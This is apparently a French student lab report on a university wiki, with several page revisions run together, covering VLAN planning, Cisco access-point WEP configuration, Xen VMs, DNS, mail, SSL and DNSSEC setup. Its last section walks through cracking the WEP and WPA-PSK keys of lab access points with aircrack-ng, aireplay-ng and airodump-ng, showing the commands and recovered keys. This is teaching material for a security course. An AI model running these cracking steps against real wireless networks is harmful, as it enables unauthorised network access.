Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35659TP sysres IMA2a5 2016/2017 G42016-12-06T11:09:33Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
<br />
<TABLE BORDER="1"> <br />
<CAPTION> Voici le titre du tableau </CAPTION> <br />
<TR> <br />
<TH> N° VLAN </TH> <br />
<TH> Prénom </TH> <br />
<TH> Réseau local </TH> <br />
<TH> Nom VM </TH> <br />
<TH> @IP VM </TH><br />
</TR><br />
<TR> <br />
<TD> VLAN20 </TD> <br />
<TD> Dimitri </TD> <br />
<TD> 10.60.20.0/24 </TD> <br />
<TD> Vald </TD><br />
<TD> 193.48.57.182/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN21 </TD> <br />
<TD> Nabil </TD> <br />
<TD> 10.60.21.0/24 </TD> <br />
<TD> Pnl </TD><br />
<TD> 193.48.57.177/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN22 </TD> <br />
<TD> Hugo </TD> <br />
<TD> 10.60.22.0/24 </TD> <br />
<TD> Gradur </TD><br />
<TD> 193.48.57.178/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN23 </TD> <br />
<TD> Otmane </TD> <br />
<TD> 10.60.23.0/24 </TD> <br />
<TD> Lartiste </TD><br />
<TD> 193.48.57.179/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN24 </TD> <br />
<TD> Clement </TD> <br />
<TD> 10.60.24.0/24 </TD> <br />
<TD> Gringe </TD><br />
<TD> 193.48.57.180/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN25 </TD> <br />
<TD> Joan </TD> <br />
<TD> 10.60.25.0/24 </TD> <br />
<TD> Orelsan </TD><br />
<TD> 193.48.57.181/28 </TD> <br />
</TR> <br />
</TABLE> <br />
<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètre de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35658TP sysres IMA2a5 2016/2017 G42016-12-06T11:08:39Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
<br />
<TABLE BORDER="1"> <br />
<CAPTION> Voici le titre du tableau </CAPTION> <br />
<TR> <br />
<TH> N° VLAN </TH> <br />
<TH> Prénom </TH> <br />
<TH> Réseau local </TH> <br />
<TH> Nom VM </TH> <br />
<TH> @IP VM </TH><br />
</TR><br />
<TR> <br />
<TH> VLAN20 </TH> <br />
<TD> Dimitri </TD> <br />
<TD> 10.60.20.0/24 </TD> <br />
<TD> Vald </TD><br />
<TD> 193.48.57.182/28 </TD> <br />
</TR> <br />
<TR><br />
<TH> VLAN21 </TH> <br />
<TD> Nabil </TD> <br />
<TD> 10.60.21.0/24 </TD> <br />
<TD> Pnl </TD><br />
<TD> 193.48.57.177/28 </TD> <br />
</TR><br />
<TR> <br />
<TH> VLAN22 </TH> <br />
<TD> Hugo </TD> <br />
<TD> 10.60.22.0/24 </TD> <br />
<TD> Gradur </TD><br />
<TD> 193.48.57.178/28 </TD> <br />
</TR><br />
<TR> <br />
<TH> VLAN23 </TH> <br />
<TD> Otmane </TD> <br />
<TD> 10.60.23.0/24 </TD> <br />
<TD> Lartiste </TD><br />
<TD> 193.48.57.179/28 </TD> <br />
</TR> <br />
<TR><br />
<TH> VLAN24 </TH> <br />
<TD> Clement </TD> <br />
<TD> 10.60.24.0/24 </TD> <br />
<TD> Gringe </TD><br />
<TD> 193.48.57.180/28 </TD> <br />
</TR> <br />
<TR><br />
<TH> VLAN25 </TH> <br />
<TD> Joan </TD> <br />
<TD> 10.60.25.0/24 </TD> <br />
<TD> Orelsan </TD><br />
<TD> 193.48.57.181/28 </TD> <br />
</TR> <br />
</TABLE> <br />
<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètre de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
